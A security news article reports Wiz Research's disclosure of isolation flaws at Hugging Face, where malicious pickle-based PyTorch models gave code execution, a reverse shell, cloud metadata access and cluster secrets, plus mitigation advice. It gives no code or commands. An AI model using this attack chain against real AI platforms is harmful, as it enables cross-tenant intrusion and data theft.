The fast acceptance of AI has serious security issues, as this necessitates strict security measures to be put in place for the protection of sensitive information within shared cloud AI infrastructure.
Wiz Research, a cybersecurity firm, in collaboration with AI-as-a-Service firms, recently discovered some common security flaws across the sector that could expose users’ personal data and models.
The implications of these findings have to be taken seriously considering AI services are now available in more than 70% of cloud environments.
AI-As-A-Service Providers Vulnerability
Malicious models pose a severe threat, enabling cross-tenant attacks and access to millions of private AI models and apps within AI-as-a-service providers. Wiz uncovered critical risks in Hugging Face’s environment:-
- Shared inference infrastructure takeover risk via untrusted pickle-serialized models with potential remote code execution payloads.
- Shared CI/CD takeover risk through malicious AI applications compromising the pipeline for supply chain attacks.
When securing AI/ML systems, several factors, such as the AI model being used, the application code that uses the model, and the inference infrastructure deploying the model, must be taken into account.
Malicious people can use various methods to attack each component, including malicious input for models, insecure application code that processes the results of a model, and pickled models that compromise inference infrastructures.Â
This involves downloading unreliable AI models, similar to embedding untrustworthy codes into applications.
Hugging Face research team focused on isolation flaws in AI-as-a-service setups, examining the company’s major products:
- Inference API
- Inference Endpoints
- Spaces
However, Hugging Face’s analysis and warnings of insecure Pickle-based PyTorch models still allow inferring potentially malicious models.Â
On the other hand, researchers developed a harmful PyTorch model that runs arbitrary code when loaded and remotely executes code by using Inference API to interact with it.
Researchers achieved shell-like functionality by hooking into Hugging Face’s post-deserialization inference results management code.
This demonstrates how untrusted AI models in shared compute services are at great risk due to inadequate isolation.
As a result of gaining a reverse shell through the Hugging Face Inference API, researchers realized that they were inside one pod within an Amazon EKS Kubernetes cluster.
They exploited common misconfigurations like querying the node’s IMDS to get the node role and cluster name via AWS permissions.
With node role privileges, these people got access to pod information as well as secrets that brought to light the risks of lateral movement and data leakage.
Moreover, it also executed code by using a malicious Dockerfile in Hugging Face Spaces, which demonstrated potential supply chain attack vectors caused by network isolation issues in the container registry.Â
Researchers urged to allow IMDSv2 with Hop limits, apply tighter access controls, and impose authentication measures for securing shared AI environment.
Secure your emails in a heartbeat! Take Trustifi free 30-second assessment and get matched with your ideal email security vendor - Try Here